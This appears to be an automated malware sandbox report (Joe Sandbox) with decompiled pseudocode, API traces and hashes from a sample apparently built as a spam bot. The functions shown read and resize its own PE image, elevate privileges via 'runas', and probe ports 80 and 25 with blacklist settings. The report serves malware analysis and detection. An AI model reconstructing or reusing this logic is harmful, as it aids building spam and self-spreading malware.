                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                                                                  • htons.WS2_32(00000035), ref: 00402E88
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00402E93
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: GetNetworkParams$iphlpapi.dll
                                                                                                                                  • API String ID: 929413710-2099955842
                                                                                                                                  • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                                                                  • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040675C Relevance: 19.7, APIs: 13, Instructions: 199fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						if(ReadFile(_v12,  &_v132, 0x40,  &_a12, 0) == 0 || SetFilePointer(_v12, _v72, 0, 0) == 0xffffffff || ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0) == 0 || SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0) == 0xffffffff) {
							goto L31;
						} else {
							_v20 = 0;
							_v24 = 0;
							if(0 < _v374) {
								while(1) {
									_t115 = 0x28;
									_a12 = _t115;
									if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
										break;
									}
									_t143 = _v374 & 0x0000ffff;
									if(_v24 != _t143 - 1) {
										_t120 = _v48 + _v52;
									} else {
										_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
									}
									_a12 = _t120;
									if(_v20 < _t120) {
										_v20 = _t120;
									}
									_v24 = _v24 + 1;
									if(_v24 < _t143) {
										continue;
									} else {
									}
									goto L23;
								}
								_v8 = 0;
							}
							L23:
							if(_v24 >= (_v374 & 0x0000ffff)) {
								_t102 = _v20;
								if(_v8 > _t102) {
									_v8 = _t102;
								}
								_t103 = E0040EBCC(_v8);
								_v16 = _t103;
								if(_t103 == 0) {
									goto L31;
								} else {
									if(SetFilePointer(_v12, 0, 0, 0) == 0xffffffff) {
										L30:
										_v8 = 0;
										E0040EC2E(_v16);
										_v16 = 0;
									} else {
										_t146 = _v16;
										if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
											goto L30;
										} else {
											 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
											_v8 = _v20;
										}
									}
								}
							}
						}
					}
					CloseHandle(_v12);
				}
				 *_a8 = _v8;
				return _v16;
			}



























                                                                                                                                  0x0040676a
                                                                                                                                  0x0040676d
                                                                                                                                  0x00406778
                                                                                                                                  0x0040677e
                                                                                                                                  0x0040677e
                                                                                                                                  0x0040679a
                                                                                                                                  0x0040679c
                                                                                                                                  0x004067a2
                                                                                                                                  0x004067b2
                                                                                                                                  0x004067b2
                                                                                                                                  0x004067b8
                                                                                                                                  0x004067bf
                                                                                                                                  0x004067bf
                                                                                                                                  0x004067c9
                                                                                                                                  0x004067d3
                                                                                                                                  0x004067d9
                                                                                                                                  0x004067df
                                                                                                                                  0x0040696b
                                                                                                                                  0x0040696b
                                                                                                                                  0x004067ed
                                                                                                                                  0x00406801
                                                                                                                                  0x00406804
                                                                                                                                  0x0040680b
                                                                                                                                  0x00000000
                                                                                                                                  0x00406867
                                                                                                                                  0x00406869
                                                                                                                                  0x0040686c
                                                                                                                                  0x00406876
                                                                                                                                  0x00406878
                                                                                                                                  0x0040687a
                                                                                                                                  0x00406881
                                                                                                                                  0x0040688f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406891
                                                                                                                                  0x0040689e
                                                                                                                                  0x004068ba
                                                                                                                                  0x004068a0
                                                                                                                                  0x004068b2
                                                                                                                                  0x004068b2
                                                                                                                                  0x004068bd
                                                                                                                                  0x004068c3
                                                                                                                                  0x004068c5
                                                                                                                                  0x004068c5
                                                                                                                                  0x004068c8
                                                                                                                                  0x004068ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004068d0
                                                                                                                                  0x00000000
                                                                                                                                  0x004068ce
                                                                                                                                  0x004068d2
                                                                                                                                  0x004068d2
                                                                                                                                  0x004068d5
                                                                                                                                  0x004068df
                                                                                                                                  0x004068e5
                                                                                                                                  0x004068eb
                                                                                                                                  0x004068ed
                                                                                                                                  0x004068ed
                                                                                                                                  0x004068f3
                                                                                                                                  0x004068f9
                                                                                                                                  0x004068fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00406900
                                                                                                                                  0x0040690b
                                                                                                                                  0x0040695a
                                                                                                                                  0x0040695d
                                                                                                                                  0x00406960
                                                                                                                                  0x00406966
                                                                                                                                  0x0040690d
                                                                                                                                  0x0040690d
                                                                                                                                  0x00406920
                                                                                                                                  0x00000000
                                                                                                                                  0x00406922
                                                                                                                                  0x0040694f
                                                                                                                                  0x00406955
                                                                                                                                  0x00406955
                                                                                                                                  0x00406920
                                                                                                                                  0x0040690b
                                                                                                                                  0x004068fe
                                                                                                                                  0x004068df
                                                                                                                                  0x0040680b
                                                                                                                                  0x00406971
                                                                                                                                  0x00406971
                                                                                                                                  0x0040697f
                                                                                                                                  0x00406986

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,761B43E0,00000000), ref: 0040688B
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,761B43E0,00000000), ref: 00406906
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,761B43E0,00000000), ref: 0040691C
                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,761B43E0,00000000), ref: 00406971
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2622201749-0
                                                                                                                                  • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                                                                  • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409326 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161);
						L39:
						_t96 = E004091EB();
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x5e0d0000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x5e0d0106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x5e0d0107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x5e0d0000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}




























                                                                                                                                  0x00409326
                                                                                                                                  0x00409327
                                                                                                                                  0x00409330
                                                                                                                                  0x00409339
                                                                                                                                  0x00409348
                                                                                                                                  0x00409358
                                                                                                                                  0x0040935c
                                                                                                                                  0x0040935c
                                                                                                                                  0x0040935c
                                                                                                                                  0x0040934a
                                                                                                                                  0x00409353
                                                                                                                                  0x00409353
                                                                                                                                  0x00409375
                                                                                                                                  0x0040937d
                                                                                                                                  0x0040937f
                                                                                                                                  0x0040937f
                                                                                                                                  0x0040938c
                                                                                                                                  0x00409394
                                                                                                                                  0x004093a2
                                                                                                                                  0x004093d9
                                                                                                                                  0x004093dc
                                                                                                                                  0x004093dd
                                                                                                                                  0x004093e0
                                                                                                                                  0x004093e3
                                                                                                                                  0x004093e6
                                                                                                                                  0x004093e9
                                                                                                                                  0x004093ec
                                                                                                                                  0x0040940c
                                                                                                                                  0x00409412
                                                                                                                                  0x004093a4
                                                                                                                                  0x004093a4
                                                                                                                                  0x004093a5
                                                                                                                                  0x004093a8
                                                                                                                                  0x004093ab
                                                                                                                                  0x004093ae
                                                                                                                                  0x004093b1
                                                                                                                                  0x004093ce
                                                                                                                                  0x004093d4
                                                                                                                                  0x004093d4
                                                                                                                                  0x0040941d
                                                                                                                                  0x00409420
                                                                                                                                  0x00409425
                                                                                                                                  0x0040942c
                                                                                                                                  0x00409441
                                                                                                                                  0x0040945d
                                                                                                                                  0x0040946b
                                                                                                                                  0x0040948d
                                                                                                                                  0x0040949b
                                                                                                                                  0x004094a0
                                                                                                                                  0x004094a0
                                                                                                                                  0x004094a3
                                                                                                                                  0x004094b0
                                                                                                                                  0x004094b3
                                                                                                                                  0x0040962f
                                                                                                                                  0x00409632
                                                                                                                                  0x00409632
                                                                                                                                  0x00409634
                                                                                                                                  0x00409634
                                                                                                                                  0x00409637
                                                                                                                                  0x0040967b
                                                                                                                                  0x00409681
                                                                                                                                  0x00409682
                                                                                                                                  0x00409683
                                                                                                                                  0x00409683
                                                                                                                                  0x0040968a
                                                                                                                                  0x00409690
                                                                                                                                  0x00409692
                                                                                                                                  0x00409692
                                                                                                                                  0x00409692
                                                                                                                                  0x0040969a
                                                                                                                                  0x0040969d
                                                                                                                                  0x0040969d
                                                                                                                                  0x004096a0
                                                                                                                                  0x004096a2
                                                                                                                                  0x004096a9
                                                                                                                                  0x004096a9
                                                                                                                                  0x00409641
                                                                                                                                  0x00409648
                                                                                                                                  0x0040964a
                                                                                                                                  0x00409673
                                                                                                                                  0x00409674
                                                                                                                                  0x00000000
                                                                                                                                  0x00409674
                                                                                                                                  0x00409652
                                                                                                                                  0x00409652
                                                                                                                                  0x00409657
                                                                                                                                  0x0040965c
                                                                                                                                  0x00409662
                                                                                                                                  0x00409666
                                                                                                                                  0x00409666
                                                                                                                                  0x0040962b
                                                                                                                                  0x0040962b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040962b
                                                                                                                                  0x004094ce
                                                                                                                                  0x004094d5
                                                                                                                                  0x004094dc
                                                                                                                                  0x004094e3
                                                                                                                                  0x004094e8
                                                                                                                                  0x004094f9
                                                                                                                                  0x0040951a
                                                                                                                                  0x0040951f
                                                                                                                                  0x00409526
                                                                                                                                  0x0040952c
                                                                                                                                  0x0040952e
                                                                                                                                  0x00409551
                                                                                                                                  0x00409556
                                                                                                                                  0x0040955d
                                                                                                                                  0x00409563
                                                                                                                                  0x00409565
                                                                                                                                  0x00409567
                                                                                                                                  0x00409567
                                                                                                                                  0x00409530
                                                                                                                                  0x00409530
                                                                                                                                  0x00409530
                                                                                                                                  0x00409571
                                                                                                                                  0x00409577
                                                                                                                                  0x004094fb
                                                                                                                                  0x004094fb
                                                                                                                                  0x004094fb
                                                                                                                                  0x0040957a
                                                                                                                                  0x0040957f
                                                                                                                                  0x0040958d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409597
                                                                                                                                  0x0040959a
                                                                                                                                  0x0040961a
                                                                                                                                  0x0040961f
                                                                                                                                  0x0040961f
                                                                                                                                  0x00000000
                                                                                                                                  0x004095a3
                                                                                                                                  0x004095c0
                                                                                                                                  0x0040960c
                                                                                                                                  0x00409612
                                                                                                                                  0x00409625
                                                                                                                                  0x00409625
                                                                                                                                  0x00000000
                                                                                                                                  0x00409625
                                                                                                                                  0x004095d1
                                                                                                                                  0x004095db
                                                                                                                                  0x004095e7
                                                                                                                                  0x004095ed
                                                                                                                                  0x004095f3
                                                                                                                                  0x004095f9
                                                                                                                                  0x00409601
                                                                                                                                  0x00409601
                                                                                                                                  0x004095f9
                                                                                                                                  0x00000000
                                                                                                                                  0x004095db
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                                                                  • wsprintfA.USER32 ref: 004093CE
                                                                                                                                  • wsprintfA.USER32 ref: 0040940C
                                                                                                                                  • wsprintfA.USER32 ref: 0040948D
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                                                                  • String ID: runas
                                                                                                                                  • API String ID: 3696105349-4000483414
                                                                                                                                  • Opcode ID: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
                                                                                                                                  • Instruction ID: 6752aeb10d98b7ea2ac03540c689f78e3d44a0922e5129ac444c5da45af1d8ff
                                                                                                                                  • Opcode Fuzzy Hash: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
                                                                                                                                  • Instruction Fuzzy Hash: 5EA181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402011 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 160COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}














                                                                                                                                  0x0040201e
                                                                                                                                  0x00402020
                                                                                                                                  0x0040202f
                                                                                                                                  0x0040202f
                                                                                                                                  0x0040203b
                                                                                                                                  0x0040203d
                                                                                                                                  0x0040204c
                                                                                                                                  0x0040204c
                                                                                                                                  0x00402058
                                                                                                                                  0x0040205a
                                                                                                                                  0x00402069
                                                                                                                                  0x00402069
                                                                                                                                  0x00402078
                                                                                                                                  0x00402080
                                                                                                                                  0x0040208e
                                                                                                                                  0x00402090
                                                                                                                                  0x00402095
                                                                                                                                  0x0040209a
                                                                                                                                  0x0040209c
                                                                                                                                  0x004020a1
                                                                                                                                  0x004020ab
                                                                                                                                  0x00000000
                                                                                                                                  0x004020ad
                                                                                                                                  0x004020ad
                                                                                                                                  0x004020bd
                                                                                                                                  0x004020d0
                                                                                                                                  0x004020d0
                                                                                                                                  0x004020d0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004020bd
                                                                                                                                  0x00000000
                                                                                                                                  0x004020bf
                                                                                                                                  0x004020bf
                                                                                                                                  0x004020c0
                                                                                                                                  0x004020c9
                                                                                                                                  0x004020ce
                                                                                                                                  0x004020d4
                                                                                                                                  0x004020d6
                                                                                                                                  0x004020d6
                                                                                                                                  0x004020e5
                                                                                                                                  0x004020e7
                                                                                                                                  0x004020ec
                                                                                                                                  0x004020f1
                                                                                                                                  0x004020f3
                                                                                                                                  0x004020f8
                                                                                                                                  0x00402102
                                                                                                                                  0x00000000
                                                                                                                                  0x00402104
                                                                                                                                  0x00402104
                                                                                                                                  0x00402114
                                                                                                                                  0x00402127
